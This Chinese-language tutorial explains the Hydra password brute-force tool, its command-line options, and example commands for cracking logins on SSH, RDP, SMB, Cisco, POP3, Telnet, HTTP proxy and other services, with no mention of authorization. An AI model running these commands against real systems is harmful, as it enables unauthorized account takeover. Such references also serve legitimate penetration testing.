0X01:工具介紹:
Hydra是著名黑客組織thc的一款開源的暴力破解密碼的工具,可以對多種服務的賬號和密碼進行爆破,包括web登錄、數據庫、SSH、FTP、RDP等服務,支持linux、windows、mac平台安裝,其中kali linux自帶hydra。
0X02:參數詳解:
-R 根據上一次進度繼續破解 -S 使用SSL協議連接 -s 指定端口 -l 指定用戶名 -L 指定用戶名字典(文件) -p 指定密碼破解 -P 指定密碼字典(文件) -e 空密碼探測和指定用戶密碼探測(ns) -C 用戶名可以用:分割(username:password)可以代替-l username -p password -o 輸出文件 -t 指定多線程數量,默認為16個線程 -vV 顯示詳細過程 server 目標IP service 指定服務名(telnet ftp pop3 mssql mysql ssh ssh2......)
0X03:使用案例:
使用hydra破解ssh的密碼:
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
破解https:
hydra -m /index.php -l username -P pass.txt IP https
破解teamspeak:
hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
破解cisco:
hydra -P pass.txt IP cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解smb:
hydra -l administrator -P pass.txt IP smb
破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
破解rdp:
hydra IP rdp -l administrator -P pass.txt -V
破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
破解telnet
hydra IP telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V